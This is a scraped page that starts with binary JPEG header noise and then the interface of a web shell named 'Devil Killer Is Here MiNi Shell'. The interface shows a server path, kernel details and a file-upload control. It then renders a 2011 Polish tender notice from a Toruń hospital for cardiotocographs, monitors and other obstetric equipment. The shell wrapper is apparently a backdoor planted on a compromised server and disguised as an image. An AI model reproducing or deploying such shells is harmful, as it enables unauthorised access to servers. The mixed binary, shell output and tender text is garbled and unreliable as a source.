JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110307/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110307/74855-N-2011.html

<p class="kh_header"><b>Toruń: Dostawa kardiotokografów, myjni-dezynfektorów, vacuum extractora, monitorów czynności życiowych, monitorów płodu do ciąży bliźniaczej, rozbudowa systemu monitorowania i nadzoru okołoporodowego Monako o dodatkowe 7 stanowisk oraz o interfejs, doposażenie aparatu KTG o telemetrię, dostawa ultrasonografu do badań noworodków.</b><br>
<b>Numer ogłoszenia: 74855 - 2011; data zamieszczenia: 07.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa kardiotokografów, myjni-dezynfektorów, vacuum extractora, monitorów czynności życiowych, monitorów płodu do ciąży bliźniaczej, rozbudowa systemu monitorowania i nadzoru okołoporodowego Monako o dodatkowe 7 stanowisk oraz o interfejs, doposażenie aparatu KTG o telemetrię, dostawa ultrasonografu do badań noworodków..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:<br>
Zadanie Nr 1 - dostawa 3 szt. kardiotokografów<br>
Zadanie Nr 2 - dostawa 2 szt. myjni-dezynfektorów<br>
Zadanie Nr 3 - dostawa 1 szt. vacuum extractora<br>
Zadanie Nr 4 - dostawa 2 szt. monitorów czynności życiowych<br>
Zadanie Nr 5 - dostawa 2 szt. monitorów płodu do ciąży bliźniaczej<br>
Zadanie Nr 6 - rozbudowa systemu monitorowania i nadzoru okołoporodowego Monako o dodatkowe 7 stanowisk oraz o interfejs<br>
Zadanie Nr 7 - doposażenie aparatu KTG o telemetrię<br>
Zadanie Nr 8 - dostawa 1 szt. ultrasonografu do badań noworodków.<br>
Zadanie Nr 1:<br>
1. Kolorowy ekran dotykowy TFT pochylany o przekątnej większej lub równej 6,5 cala<br>
2. Metoda pomiarowa  Cardio, ultradźwiękowy Doppler pulsacyjny<br>
3. Zakres pomiarowy US 50 ÷240 bpm<br> 
4. Nieinwazyjne monitorowanie i rejestracja czynności serca płodu<br>
5. Częstotliwość pracy mniejsza lub równa 1,2  MHz<br>
6. Wartość natężenie emitowanej fali US mniejsze lub równe 2,4  mW/cm2<br>
7. Wskaźnik jakości sygnału<br>
8. Znacznik dla personelu<br>
9. Ręczny znacznik ruchów płodu dla matki<br>
10. Automatyczne monitorowanie ruchów płodu<br>
11. Czasownik NST<br>
12. Ustawiane zakresy alarmów FHR dla bradykardii i tachykardii od 60÷210 bpm
Zakresy ustawiane krokiem 10 bpm<br>
13. Zakresy opóźnień występowania alarmów dla bradykardii, tachykardii i utraty sygnału,  
Zakresy ustawiane krokiem 10 sekundowym 10÷300 sekund<br>
14. Prezentacja cyfrowej wartości FHR i Toco<br>
15. Na wyposażeniu aparatu przetwornik Toco 1 szt. i przetwornik Cardio - 1 szt.<br>
16. Wodoszczelność przetworników - minimum IP50. Podać oznaczenie IP<br>
17. Jednakowe głowice we wszystkich oferowanych urządzeniach. Możliwość przenoszenia głowic pomiędzy aparatami.<br>
18. Możliwość monitorowania bliźniaków<br>
19. Przesunięcie ( separacja zapisów) w przypadku ciąży bliźniaczej z informacją o włączeniu funkcji. Możliwość włączenia i wyłączenia funkcji<br>
20. Możliwość rozbudowy o monitorowanie trojaczków<br> 
21. Możliwość rozbudowy o analizę zapisu KTG<br>
22. Metoda pomiarowa Toco<br> 
23. Nieinwazyjne monitorowanie i rejestracja czynności skurczowej macicy<br>
24. Zakres sygnałów min. 0÷125<br>
25. Ustawienie linii podstawowej min. 20 jednostek<br>
26. Automatyczna korekcja offsetu<br>
27. Automatyczna korekcja zerowania<br>
28. Monitorowanie tętna matki<br> 
29. Wodoszczelne oraz proste do utrzymania w czystości przetworniki Cardio i Toco posiadające identyfikację w postaci optycznego elementu sygnałowego<br>
30. Praca samodzielna lub w systemie nadzoru położniczego<br>
31. Możliwość współpracy z telemetrią płodową<br>
32. Możliwość monitorowania NIBP matki<br>
33. Graficzny rejestrator termiczny wbudowany w urządzenie<br>
34. Standardowe prędkości przesuwania papieru 1,2 i 3 cm/min.<br>
35. Duże prędkości zapisu (zapisy archiwalne)<br>
36. Wprowadzanie (drukowanie) notatek tekstowych<br>
37. Wprowadzanie danych demograficznych pacjentki w KTG (ekranowa klawiatura w układzie QWERTY)<br>
38. Rozdzielczość  8 punktów/ mm 200 dpi<br>
39. Alarm końca papieru<br>
40. Kompaktowa obudowa<br>
41. Wózek pod monitor płodu<br>
42. Okres gwarancji - min 24 miesiące<br>
43. Czas reakcji serwis - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika<br> 
44. Gwarancja zapewnienia zakupu części zamiennych  przez okres 10 lat.<br>
45. Bezpłatne  szkolenie  pracowników Zamawiającego obsługujących urządzenie<br> 
46. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji<br>
47.Aparat  zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)<br> 
48. Bezpłatna instalacja urządzenia<br> 
49. Instrukcja obsługi i karta gwarancyjna w języku polskim<br> 
Zadanie Nr 2:<br>
1 Urządzenie przeznaczone do opróżniania, mycia,  dezynfekcji i suszenia basenów, kaczek, pojemników na mocz, misek do mycia chorych i innego sprzętu pomocniczego.<br>
2 Model stojący  na posadzce wykonany ze stali nierdzewnej.<br>
3 Dezynfekcja termiczna zgodnie z normą EN ISO 15883-3<br>
4 Zbiornik na wodę ze stali nierdzewnej zintegrowany - zespolony z własną wytwornicą pary<br>
5 Komora mycia ze stali nierdzewnej, głęboko tłoczona, bez spoin z nachyleniem sufitu<br>
6 Minimalna pojemność komory dla uchwytu standardowego: 1 basen z pokrywką i 1 kaczka lub 3 kaczki. Możliwość wymiany i stosowania uchwytów specjalistycznych<br>
7 Drzwi uchylne, na przedniej ścianie urządzenia, otwierane i zamykane ręcznie bez oporów przy zamykaniu i otwieraniu<br>
8 System  dysz strumieniowych zapewniający dużą efektywność czyszczenia, niezależnie od zmian ciśnienia wody zasilającej. Minimum 10 dysz w tym rotacyjna<br>
9 Brak przecieków pary wodnej przez drzwi komory.<br>                           
10 Wewnętrzna automatyczna dezynfekcja termiczna wszystkich rur doprowadzających wodę oraz dysz strumieniowych<br>            
11 Mikrokomputerowe sterowanie pracą urządzenia<br>                   
12 Ergonomiczny ekran wyświetlający  informacje niezbędne do obsługi i kontroli urządzenia w języku polskim<br>                        
13 Optyczne i akustyczne informacje  o usterkach<br>
14 Programy dla mniej i bardziej zabrudzonych przedmiotów, poddawanych procesowi mycia i dezynfekcji. Minimum 3 programy standardowe<br>                            
15 Preferowane maksymalne wymiary zewnętrzne<br>
* Szerokość : 500 mm.<br>                                  
* Głębokość : 500 mm.<br>                                           
* Wysokość : 1800 mm<br>
16 Urządzenie wyposażone w opcję schładzania i suszenia, tzn. po zakończonym cyklu mycia, dezynfekcji i suszenia naczynia sanitarne poddawane temu procesowi muszą być schłodzone, suche, bez skroplin wody na powierzchni i wewnątrz naczyń<br>
17 Maksymalne zużycie wody na cykl do 25l/cykl<br>                                               
18 Maksymalny poziom wytwarzanego hałasu.  max 50 dB<br>  
19 Zasilanie z 3-fazowej sieci elektroenergetycznej  3 x 400 VAC 50 Hz.<br>
20 Podłączenie zimnej i ciepłej wody ? cala<br>
21 Podłączenie odpływu ścienne lub podłogowe 100 ?<br>                              
22 Gwarancja, min. 24 miesiące<br>                                   
23 Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat<br> 
24 Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez  użytkownika<br>  
25 Instrukcja użytkowania i karta gwarancyjna w języku polskim<br>
26 Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br>
27 Bezpłatna instalacja urządzenia<br> 
28 Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji.<br>
29 Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)<br>
30 Dostawa pakietu startowego: wymagane środki chemiczne 
Kanister 5L, podsuwacze plastikowe 5 sztuk<br>      
Zadanie Nr 3:<br>
1. Urządzenie gwarantujące bezpieczne wykonanie vacuum extrakcji noworodka oraz opcjonalnie przystosowane do użytkowania jako ssak.<br>
2. Zasilanie 230 VAC 50 Hz+/-10%<br>
3. Podciśnienie max.85 kPa<br>
4. Maksymalna wydajność ( mierzona w zakresie pracy za zbiornikiem na wydzieliny): nie mniejsza niż 30l/min i nie większa niż 35l/min<br>
5. Możliwość precyzyjnego ustawienia podciśnienia za pomocą regulatora membranowego<br>
6. Wielostopniowe zabezpieczenie przed przelaniem - zaoferować zbiornik zabezpieczający 0,25-0,5 litra<br>
7. Przystosowany do pracy ciągłej 24h/dobę<br> 
8. Pompa niskoobrotowa (do 100 obr/min) tłokowa, wytwarzająca podciśnienie bezolejowa, nie wymagająca konserwacji<br> 
9. Cicha praca max. 42 dB<br>
10. Urządzenie na stojaku jezdnym na czterech kołach (dwa z blokadami)<br>
11. Wersja AP umożliwiająca pracę w atmosferze stężonych gazów anestetycznych<br>
12. Zbiornik 1 litrowy wielorazowy z polisulfonianu na wydzielinę, nietłukący z tworzywa z podziałką, do sterylizacji w temperaturze do 134 stopni C<br>
13. Pelota położnicza silikonowa wielorazowa autoklawowalna rozmiar 50 i 60 mm<br>
14. Nożny regulator podciśnienia<br> 
15. Włącznik /wyłącznik nożny zintegrowany ze stojakiem<br>
16. Filtry antybakteryjne - min. 5 szt.<br>
17. Dren silikonowy wielorazowy autoklawowalny - min. 4 m<br>
18. Uchwyt na dren<br>
19. Gwarancja, min. 36  miesiące<br>                                                
20. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat<br> 
21. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez  użytkownika<br>  
22. Instrukcja użytkowania i karta gwarancyjna w języku polskim<br>
23. Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br>
24. Bezpłatna instalacja urządzenia<br> 
25. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji.<br>
26. Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)<br>
Zadanie Nr 4:<br>
1	Zasilanie:<br>
- sieciowe (230V,50Hz) i z akumulatora<br>
- możliwość automatycznego ładowania akumulatora z sieci<br>
- alarmy stanu rozładowania<br>
- czas pracy przy zasilaniu akumulatorowym min. 1,5 godz.<br>
- łatwa wymiana akumulatorów przez użytkownika, bez rozkręcania monitora<br>
PARAMETRY MONITOROWANE<br>
2	EKG<br>
3	Impedancja wejściowa >2 Megaomów<br>
4	Zakres częstości akcji serca: min:15-250/min<br>
5	Możliwość jednoczesnej prezentacji min. 7 kanałów EKG<br>
6	Min. 3 prędkości kreślenia: 12.5, 25, 50 mm/sek.<br>
7	Obwód zabezpieczony przed defibrylacją (min.5kV)<br>
8	Wzmocnienie:<br> 
x0,25; x0,5; x1; x2; x4 i Auto<br>
9	Wyświetlane odprowadzenia: I, II, III, aVR, aVL, aVF, V.<br>
10	Alarmy<br>
11	Możliwość zawieszenia alarmów<br>
12	Wykrywanie impulsów stymulatora serca<br>
13	Możliwość wyboru kanału do detekcji stymulatora<br>
14	Możliwość podglądu w dowolnej chwili min. 10 min wstecz, zapisu EKG / full disclosure/. Możliwość zapisywania w pamięci kardiomonitora min. 10 odcinków EKG po min. 10 minut do późniejszego przeglądania.<br>
15	Analiza odcinka ST w zakresie +/- 0,8 mV z prezentacją co najmniej 4 odprowadzeń jednocześnie<br>
16	Możliwość ustawienia położenia punktu J<br>
17	Możliwość  własnego ustawienia pozycji pomiaru
Odcinka P-R<br>
18	Analiza arytmii co najmniej 10 rodzajów<br>
19	Możliwość powiększania dowolnego wybranego zespołu QRS i manualnego dokonywania pomiarów (amplituda i długości odcinków)<br>
20	Analiza zmian HR z dowolnie wybranego przedziału czasowego<br>
21	Statystyka zmian HR z prezentacją w postaci trendów graficznych<br>
	 NIBP<br>
22	Oscylometryczna metoda pomiaru<br>
23	Zakres ciśnienia skurczowego: min. 40-250 mmHg<br>
24	Zakres ciśnienia rozkurczowego: min. 10-180 mmHg<br>
25	Wyświetlanie wartości cyfrowych skurczowe/ rozkurczowe/średnie<br>
26	Czas pomiaru maks. 40 sekund<br>
27	Możliwość pomiaru u różnych grup wiekowych - od noworodka do dorosłego<br>
28	Możliwość automatycznego cyklu pomiarowego z regulowanym interwałem czasowym od 1-480 min<br>
	SpO2<br>
29	Pomiar metodą absorpcji światła<br>
30	Zakres pomiaru: 0-100%<br>
31	Dokładność pomiaru +/- 2%<br>
32	Sposób wyświetlania w postaci krzywej dynamicznej oraz cyfrowej<br>
33	Alarmy<br>
34	Czujnik palcowy<br>
	TEMPERATURA<br>
35	Zakres pomiaru: 0- 50 stopni C<br>
36	Dokładność pomiaru +/- 0,1 stopni C<br>
37	Rozdzielczość pomiaru +/- 0,1 stopni C<br>
38	Sposób wyświetlania- wartości cyfrowe<br>
39	Wyświetlanie różnicy temperatur<br>
	RESPIRACJA<br>
40	Metoda pomiaru impedancyjna<br>
41	Zakres pomiaru: 0-120 odd./min.<br>
42	Dokładność pomiaru +/- 2 bpm<br>
43	Sposób wyświetlania- w postaci krzywej dynamicznej oraz wartości cyfrowej<br>
44	Alarmy<br>
45	Sygnalizacja i możliwość wyboru z pozycji kardiomonitora odprowadzenia użytego do pomiaru oddechu w celu dopasowania do różnych sposobów oddychania (szczytami płuc, przeponą)<br>
	EKRAN<br>
46	Typ: TFT min. 12 cali<br>
47	Wysoka rozdzielczość monitora min. 800 x 600 dpi<br>
48	Możliwość wyświetlania jednocześnie min. 8 krzywych
Możliwość zmiany kolorów krzywych.<br> 
49	Wyświetlenie krzywe- podać<br>
50	Dane wyświetlane cyfrowo:<br>
- częstość akcji serca<br>
- średnie ciśnienie tętnicze<br>
- ciśnienie skurczowe<br>
- ciśnienie rozkurczowe<br>
- wartość saturacji<br>
- wartość respiracji<br>
- temperatura - 2 kanały<br>
wartość różnicowa temperatury  deltaT<br>
	TRENDY<br>
51	Pamięć trendu min 120 godz.
Możliwość zapisywania w pamięci kardiomonitora min. 10 odcinków trendów po min. 120 godzin do późniejszego  przeglądania<br>    
52	Pamięć dla wszystkich mierzonych parametrów<br>
	TYP URZĄDZENIA<br>
53	I klasa, BF i CF<br>
	INNE PARAMETRY<br>
54	Waga: max 7 kg<br>
55	Klawiatura alfanumeryczna do wprowadzania danych pacjenta: nazwisko, płeć, nr identyfikacyjny<br>
56	Oprogramowanie do obliczania leków<br>
57	Menu w języku polskim<br>
58	Łatwa obsługa<br> 
59	Monitor przystosowany do pracy w standardowej sieci Ethernet (złącze RJ-45) oraz do pracy w sieci poprzez łącze RS 422, w zależności od rodzaju okablowania dostępnego w danym pomieszczeniu.<br>
60	Proste uaktualnienie oprogramowania kardiomonitora poprzez złącze USB<br>
	WYPOSAŻENIE<br> 
61	Elementy wchodzące w skład wyposażenia: przewód pacjenta EKG do min. 3 elektrod, czujnik saturacji min. 2 szt., mankiet NIBP o standardowym rozmiarze, powierzchniowy czujnik temperatury, kabel zasilający.<br>
	INNE<br>
62	Gwarancja min 24 miesiące<br> 
63	Czas reakcji serwisu - w ciągu 24 godzin licząc od 
momentu  zgłoszenia awarii przez użytkownika.<br>
64	Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji.<br>
65	Bezpłatna instalacja urządzenia u Zamawiającego<br> 
66	Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie.<br>
67	Instrukcja użytkowania i karta gwarancyjna w języku polskim<br>
68	Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat.<br>
69	Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni ( w okresie gwarancji)<br>
Zadanie Nr 5:<br>
1.	Praca samodzielna lub w systemie nadzoru położniczego<br> 
2.	Ekran dotykowy o przekątnej min. 12 cm<br> 
3.	Alarm końca papieru<br> 
4.	Wskaźnik jakości sygnału<br>  
5.	Ręczny znacznik ruchów płodu dla matki<br> 
6.	Metoda pomiarowa Cardio - ultradźwiękowy Doppler pulsacyjny<br> 
7.	Standardowe prędkości przesuwania papieru 1,2 i 3 (cm/min)<br> 
8.	Automatyczne monitorowanie ruchów płodu<br> 
9.	Monitorowanie ciąży bliźniaczej<br> 
10.	Zakres pomiarowy 0-120 jednostek  (TOCO)<br>
11.	Zakres pomiarowy 50?240 bpm  (US)<br>
12.	Częstotliwość pracy mniejsza lub równa 1,7 MHz<br>
13.	Wartość natężenia emitowanej fali US mniejsza lub równa 3,0 mW/cm2<br> 
14.	Wózek pod KTG i telemetrię<br>
	Telemetria<br> 
1.	Odbiornik telemetrii- stacja bazowa, zasięg odbioru w linii prostej minimum 70 m.<br>
2.	Przetworniki Cardio i Toco w postaci nadajników bez przewodów<br> 
3.	Przetworniki Cardio i Toco wodoszczelne<br>
4.	Czas pracy przetworników Toco i Cardio przy w pełni naładowanych  akumulatorach min. 10 godz.<br>
5.	Masa przetworników:<br> 
- Cardio < 300 g<br> 
- Toco < 300g<br>
    	Wyposażenie dodatkowe<br>
1.	Interfejs J 70 do podłączenia systemu - 1 szt.<br>
2.	Znacznik ruchów płodu K 04 dla pacjentki - 1 szt.<br>
3.	Głowica Cardio - 2 szt.<br>
4.	Głowica Toco - 1 szt.<br>
5.	Pas mocujący głowice - 3 szt.<br>
6.	Kabel sieciowy - 1 szt.<br>
7.	Składanka papieru termicznego- 1 szt.<br>
8.	Żel - 1szt.<br>
	Inne wymagania<br> 
1.	Gwarancja min. 24 miesiące<br>
2.	Czas reakcji serwisu - w ciągu 24 godzin od momentu zgłoszenia awarii przez użytkownika<br>
3.	Instrukcja obsługi i karta gwarancyjna w języku polskim<br>
4.	Bezpłatny przegląd techniczny  min. 1 raz w roku w okresie trwania gwarancji<br>
5.	Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br>
6.	Bezpłatna instalacja urządzenia 
7.	Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat
8.	Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)<br>
Zadanie Nr 6:<br>
1.	Rozbudowa i adaptacja posiadanego systemu nadzoru okołoporodowego Monako o kolejne 7 stanowisk nadzoru<br>
2.	Oprogramowanie systemu<br>
3.	Stanowisko monitorujące 2 szt.: komputer, monitor  LCD 22 cale , drukarka laserowa, moduł separacyjny<br>
4.	Moduł transmisji danych z barierą galwaniczną - 7 szt.<br>
5.	Materiały instalacyjne (gniazda systemowe, kable, przewody, osłony) - komplet<br>
6.	Interfejs J70 - 7 szt.  do monitorów płodu - podłączenie systemu nadzoru okołoporodowego<br>
7.	Współpraca z większością znanych na polskim rynku kardiotokografów<br> 
8.	Automatyczna analiza wszystkich rejestrowanych zapisów<br>
9.	Monitorowanie ciąży bliźniaczej<br>
10.	Możliwość przyłączenia do systemu pulsoksymetru płodowego<br>
11.	Możliwość rozbudowy o dodatkowe stanowiska nadzoru okołoporodowego<br>
12.	Oprogramowanie - komunikacja z użytkownikiem w języku polskim<br>
13.	Możliwość współpracy z nieinwazyjnym elektrokardiografem płodowym<br>
14.	Automatyczna analiza zapisu, z możliwością dopasowania kryteriów oceny i progów alarmowych przez użytkownika<br>
15.	Alarmowanie o wykrytych nieprawidłowościach  z podaniem jego uzasadnienia<br>
16.	Wyniki analizy wyświetlane na żywo, graficznie na krzywych KTG (akceleracje, deceleracje oraz skurcze)<br>
17.	Ocena zmienności FHR w ujęciu długo i krótkoterminowym oraz identyfikacja skurczów macicy<br>
18.	Zapamiętywanie zapisów i wyników analizy w pamięci min. 25 lat<br>
19.	Równoczesne monitorowanie pacjentek na poszczególnych stanowiskach monitorujących<br>
20.	Formularze z wynikami analizy w języku polskim<br>
	Inne wymagania<br> 
1.	Gwarancja min. 24 miesiące<br>
2.	Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika<br>
3.	Bezpłatny przegląd techniczny  min. 1 raz w roku w okresie trwania gwarancji<br>
4.	Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br> 
5.	Bezpłatna instalacja urządzenia<br> 
6.	Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat<br>
7.	Instrukcja obsługi i karta gwarancyjna w języku polskim<br>
Zadanie Nr 7:<br>
1	Odbiornik telemetrii zainstalowany przy jednym z monitorów płodu<br>
2	Odbiornik telemetrii - stacja bazowa, zasięg odbioru w linii prostej minimum 80 m<br>
3	Przetworniki Cardio i Toco w postaci wodoszczelnych nadajników bez przewodów<br> 
4	Czas pracy przetworników Toco i Cardio przy w pełni naładowanych akumulatorach min. 12 godz.<br>
5	Masa przetworników:<br> 
Cardio < 150 g i Toco < 150 g<br>
6	Gwarancja, min. 24 miesiące<br>                                                
7	Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika<br>  
8	Instrukcja użytkowania i karta gwarancyjna w języku polskim<br>
9	Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji<br>
10	Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br>
11	Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)<br>
12	Bezpłatna instalacja urządzenia u Zamawiającego<br>
Zadanie Nr 8:<br>
I	Informacje ogólne<br>
1	Zasilanie sieciowe 230V/50Hz<br>
2	Technologia cyfrowa<br>
3	Górna częstotliwość pracy ultrasonografu (rozumiana jako maksymalna częstotliwość głowic aktualnie dostępnych) - min. 15 MHz<br>
4	Dynamika aparatu - min. 230 dB<br>
5	Ilość gniazd do przyłączania aktywnych głowic obrazowych przełączanych elektronicznie min. 3<br>
6	Liczba kanałów odbiorczych min. 9000<br>
7	Monitor LCD min. 17 cali o rozdzielczości pracy min. 1200x1000 pikseli<br>
8	Możliwość zmiany położenia monitora w trzech płaszczyznach względem konsoli<br>
9	Możliwość zmiany wysokości - min. 10 cm<br>
10	Możliwość obrotu konsoli min +/- 120 st<br>
11	Liczba obrazów pomięci dynamicznej (cineloop) dla obrazu 2D i color Doppler - min. 1000<br>
12	Czas startu aparatu do momentu wyświetlenia obrazu USG - maks. 90 s<br>
13	Wyposażony w 4 skrętne kółka<br>
II	Tryby obrazowania<br>
1	2D (B-mode), M-mode, Anatomiczny M-mode<br>
2	Płynna zmiana szerokości pola widzenia dla obrazu B-mode dla wszystkich oferowanych głowic<br>
3	Zakres głębokości obrazowania aparatu min. 30 cm<br>
4	Obrazowanie rombowe na głowicach liniowych.<br>
5	Obrazowanie trapezoidalne na głowicach liniowych.<br>
6	Doppler pulsacyjny (PWD), Color Doppler (CD), Power Doppler (PD), M-mode na wszystkich oferowanych głowicach<br>
7	Regulacja wielkości bramki Dopplerowskiej w granicach min. 1-20 mm<br>
8	Kierunkowy Power Doppler<br>
9	Obrazowanie harmoniczne<br>
